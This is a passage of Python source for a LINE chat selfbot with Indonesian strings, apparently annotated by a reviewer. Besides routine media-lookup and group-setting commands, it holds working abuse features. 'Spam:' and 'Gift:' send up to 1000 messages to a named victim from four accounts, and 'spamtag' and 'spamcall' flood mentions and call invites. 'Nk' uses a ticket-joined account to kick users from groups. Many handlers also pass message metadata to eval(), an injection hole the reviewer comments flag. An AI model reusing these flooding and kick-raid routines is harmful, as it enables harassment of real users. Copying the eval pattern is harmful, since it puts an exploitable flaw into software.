cl.sendText(msg.to, str(ret_))
except:
# NOTE(review): `to` instead of `msg.to` — verify it is set upstream.
cl.sendText(to, "Lirik tidak ditemukan")
# -- "music: <song>": same API; sends track info then the audio itself.
elif cmd.startswith("music: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
ret_ = "╔══[ Music ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Waiting Audio ]"
cl.sendText(msg.to, str(ret_))
cl.sendText(msg.to, "Mohon bersabar musicnya lagi di upload")
cl.sendAudioWithURL(msg.to, song[3])
except:
cl.sendText(to, "Musik tidak ditemukan")
# -- "gimage: <query>": Google image search proxy; sends one random result.
elif cmd.startswith("gimage: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "https://api.xeonwz.ga/api/image/google?q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["data"] != []:
# NOTE(review): timeit.timeit() here times an empty statement — it is
# not the elapsed time of this request; also "%seconds" renders as
# "<value>econds" ("%s" + literal "econds"). Looks like leftover code.
start = timeit.timeit()
items = data["data"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"「Google Image」\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
# -- "ytmp4: <query>": scrape YouTube search results, take the second hit,
#    resolve the best stream via pafy, and send the video plus its metadata.
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
# NOTE(review): the loop just rebinds `me` to the same best.url each
# iteration — effectively `me = best.url` once.
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n™↔ Author : ' + str(vid.author)
durasi = '\n™↔ Duration : ' + str(vid.duration)
suka = '\n™↔ Likes : ' + str(vid.likes)
rating = '\n™↔ Rating : ' + str(vid.rating)
deskripsi = '\n™↔ Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
# -- "ytmp3: <query>": same scrape, but sends thumbnail + best audio stream.
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n™↔ Author : ' + str(vid.author)
durasi = '\n™↔ Duration : ' + str(vid.duration)
suka = '\n™↔ Likes : ' + str(vid.likes)
rating = '\n™↔ Rating : ' + str(vid.rating)
deskripsi = '\n™↔ Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
# -- "profileig: <username>": Instagram profile scrape via the old ?__a=1
#    endpoint; sends the HD avatar and a stats summary.
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "™↔ Link : " + "https://www.instagram.com/" + instagram
text = "™↔ Name : "+namaIG+"\n™↔ Username : "+usernameIG+"\n™↔ Biography : "+bioIG+"\n™↔ Follower : "+followerIG+"\n™↔ Following : "+followIG+"\n™↔ Post : "+mediaIG+"\n™↔ Verified : "+verifIG+"\n™↔ Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
# -- "cekdate: <date>": birth-date/zodiac lookup via a Google Apps Script API.
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"™↔ Informasi™\n\n"+"™↔ Date Of Birth : "+lahir+"\n™↔ Age : "+usia+"\n™↔ Ultah : "+ultah+"\n™↔ Zodiak : "+zodiak)
# -- "jumlah: <n>": set the repeat count used by "spamtag".
elif cmd.startswith("jumlah: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["RAlimit"] = num
cl.sendText(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
# -- "spamcall: <n>": set the repeat count used by "spamcall".
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
# -- "spamtag @user": repeatedly mention the first mentioned user, up to
#    Setmain["RAlimit"] times (hard cap 1000).
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
# SECURITY(review): eval() on message metadata executes attacker-
# influenced text; json.loads would be the safe equivalent here.
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["RAlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
# -- "spamcall": repeatedly invite all group members to a group call,
#    wait["limit"] times (hard cap 1000).
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jmlh = int(wait["limit"])
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi batas")
# -- "Gift: <mid> <n>": send n theme-gift messages (contentType 9) to a user
#    from all four accounts.
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
# -- "Spam: <mid> <n>": send the stored spam message n times from all accounts.
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["RAmessage1"]))
ki.sendMessage(midd, str(Setmain["RAmessage1"]))
kk.sendMessage(midd, str(Setmain["RAmessage1"]))
kc.sendMessage(midd, str(Setmain["RAmessage1"]))
# -- "ID line: <userid>": look up a contact by LINE ID and post link + card.
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
# NOTE(review): `if True:` is a no-op guard — possibly a stubbed check.
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
#===========Protection============#
# -- "Welcome on/off": toggle welcome messages for this group by adding or
#    removing msg.to from the `welcome` list.
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# -- "Protecturl on/off": toggle url (QR/ticket) protection for this group.
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# -- "Protectkick on/off": toggle kick protection for this group.
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# -- "Protectjoin on/off": toggle join protection for this group.
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# -- "Protectcancel on/off": toggle invite-cancel protection for this group.
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
# -- "Semua pro on/off": toggle all four protections at once. The final
#    confirmation text depends only on the protectcancel state.
elif 'Semua pro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Semua pro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectjoin:
msgs = ""
else:
protectjoin.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectjoin:
protectjoin.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
# -- "Nk @user": for each mentioned non-bot user, temporarily open the group
#    link, join the kicker account `sw` by ticket, kick the target, leave,
#    and close the link again.
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
# SECURITY(review): eval() on message metadata executes attacker-
# influenced text; json.loads would be the safe equivalent.
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "admin:repeat" or text.lower() == 'admin:repeat':
if msg._from in admin:
wait["delladmin"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "staff:repeat" or text.lower() == 'staff:repeat':
if msg._from in admin:
wait["dellstaff"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "bot:repeat" or text.lower() == 'bot:repeat':
if msg._from in admin:
wait["dellbots"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
cl.sendText(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
cl.sendText(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
cl.sendText(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
cl.sendText(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
cl.sendText(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
cl.sendText(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
cl.sendText(msg.to,"Notag dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB Blacklist User\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
cl.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========COMMAND SET============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["RAmessage1"] = spl
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "「Pesan Msg」\nPesan Msg mu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
